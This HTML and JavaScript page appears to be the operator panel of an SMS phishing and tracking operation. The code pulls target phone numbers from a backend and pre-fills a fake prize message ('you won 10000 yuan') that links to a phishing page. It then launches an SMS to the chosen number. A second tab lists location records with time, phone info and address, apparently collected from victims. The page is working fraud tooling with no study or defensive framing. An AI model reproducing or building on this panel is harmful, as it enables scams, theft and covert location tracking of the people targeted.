<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <link rel="stylesheet" href="static/layui/css/layui.css">
    <link rel="stylesheet/less" type="text/css" href="static/js/less.less" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0" />
    <style>
        body {
            /*background-color: red;*/
        }

        .main-hud {
            width: 80%;
            height: 80%;
            background-color: rgba(255,255,255,0.5);
            position: fixed;
            left: 0;
            top: 200px;
            z-index: 9999999;
            display: none;
        }

        .layui-tab-title{
            border-bottom: none;
        }

        .layui-tab-title li{
            width: 40%;
        }

        .layui-tab-brief>.layui-tab-title .layui-this {
            color: #393D49;
            font-size: 16px;
            font-weight: 300;
        }

        .layui-tab-title li {
            color: #cccccc;
            font-size: 16px;
            font-weight: 300;
        }

        .layui-tab-title li:hover {
            color: #393D49;
        }

        .layui-tab-brief>.layui-tab-more li.layui-this:after, .layui-tab-brief>.layui-tab-title .layui-this:after{
            border-color: #393D49;
        }

        .layui-form-select dl dd.layui-this {
            background-color: #393D49;
        }

        .layui-form-pane .layui-input-inline {
            width: 100%;
        }

        .send-msg-btn {
            background-color: #393D49;
            width: 100%;
        }
    </style>
</head>
<body>
<!--加载数据等待界面-->
<div class="main-hud" onclick="hideHud()">
    <span class="ant-spin-dot ant-spin-dot-spin">
            <i></i><i></i><i></i><i></i>
    </span>
</div>

<div class="layui-tab layui-tab-brief" lay-filter="main-content">
    <ul class="layui-tab-title">
        <li class="layui-this" lay-id="111">发送短信</li>
        <li lay-id="222">位置记录</li>
    </ul>
    <div class="layui-tab-content" style="height: 100px;">
        <!--发送短信-->
        <div id="tab_send_msm" class="layui-tab-item layui-show">
            <form class="layui-form layui-form-pane" action="">
                <div class="layui-input-inline">
                    <select id="phone_select" lay-filter="phone-select">
                        <option value="">选择电话号码</option>
                    </select>
                </div>
                <div class="layui-form-item" style="margin-top: 20px;">
                    <div class="layui-form-item layui-form-text">
                        <label class="layui-form-label">短信内容</label>
                        <div class="layui-input-block">
                            <textarea style="resize: none;height: 150px" id="msm_content" placeholder="请输入短信内容" class="layui-textarea"></textarea>
                        </div>
                    </div>
                </div>
                <button  onclick="sendMessage()" type="button" id="send_msg_btn" class="layui-btn send-msg-btn">发送</button>
            </form>
        </div>
        <!--查看位置-->
        <div id="ta_check_local" class="layui-tab-item">
            <div class="layui-form" style="text-align: center;">
                <table id="address_table" class="layui-table">
                    <thead>
                    <tr>
                        <th>时间</th>
                        <th>手机信息</th>
                        <th>地址</th>
                    </tr>
                    </thead>
                    <tbody>
                    </tbody>
                </table>
            </div>
        </div>
    </div>
</div>
</body>
</html>
<script src="static/layui/layui.js" charset="utf-8"></script>
<script src="static/js/jquery.min.js" charset="utf-8"></script>
<script src="static/js/less.min.js"></script>
<script src="static/js/common.js" charset="utf-8"></script>
<script>
    var phoneNumber="";
    $(document).ready(function () {
        layui.use('element', function(){
            var $ = layui.jquery
                ,element = layui.element; //Tab的切换功能，切换事件监听等，需要依赖element模块

            element.on('tab(main-content)', function(data){
                var index = data.index;

                switch (index) {
                    case 0:
                        // 切换到发送短信
                        loadPhoneList();
                        break;
                    case 1:
                        // 切换到查看位置
                        loadAddressHistory();
                        break;
                }
            });
        });

        // 监听select选择变化
        layui.use('form',function () {
            var form = layui.form;

            // 监听电话号码选择
            form.on('select(phone-select)', function(data){
                // 选择的电话号码
                var phone = data.value;
                phoneNumber = phone;
            });
        });

        // 短信内容
        var message = "恭喜你中奖10000元，点击领取:https://msm.yycode.ml/money.html";
        $("#msm_content").val(message);

        // 请求手机号码
        loadPhoneList();
    });

    // 请求手机号码
    function loadPhoneList() {
        var url = "/api.php?a=loadPhones";
        get(url,function (data) {
            var phoneList = data.data;
            var dom = "<option value=''>请选择手机号码</option>";
            for (var i = 0; i < phoneList.length; i++){
                var phone  = phoneList[i]["phone_number"];
                dom += '<option value="'+ phone +'">'+ phone +'</option>';
            }

            layui.use('form',function () {
                var form = layui.form;
                $("#phone_select").html(dom);

                form.render();
            });
        });
    }
    
    // 发送短信
    function sendMessage() {
        // 检查手机号
        if (phoneNumber.length == 0){
            alert("请选择手机号码");
            return;
        }

        // 检查短信内容
        var msg = $("#msm_content").val();
        if (msg.length == 0){
            alert("请输入短信内容");
            return;
        }

        var clientType = judgeClient();
        if (clientType == 0){

            msg = "sms://"+ phoneNumber + "&body=" + encodeURIComponent(msg);
        }else if (clientType == 1){
            msg = "sms://"+ phoneNumber + "?body=" + encodeURIComponent(msg);
        }else {
            alert("不支持的系统类型");
            return;
        }

        window.open(msg);
    }

    /*判断客户端系统类型 0:iOS 1:Android*/
    function judgeClient(){
        let client = '';
        if (/(iPhone|iPad|iPod|iOS)/i.test(navigator.userAgent)) {  //判断iPhone|iPad|iPod|iOS
            return 0;
        } else if (/(Android)/i.test(navigator.userAgent)) {  //判断Android
            return 1;
        } else {
            return 2;
        }
    }
    
    // 获取位置记录
    function loadAddressHistory() {
        var url = "/api.php?a=loadAddress";
        var dom = "";
        get(url,function (data) {
            var addresses = data.data;
            for (var i = 0; i < addresses.length; i++){
                var add = addresses[i];
                var time = add.time;
                var phoneInfo = add.phone_info;
                var address = add.address;
                dom += '<tr>';
                dom += '<td>'+ time +'</td>';
                dom += '<td>'+ phoneInfo +'</td>';
                dom += '<td>'+ address +'</td>';
                dom += '</tr>';
            }

            layui.use('form',function () {
                var form = layui.form;
                $("#address_table tbody").html(dom);
                form.render();
            });
        });
    }


</script>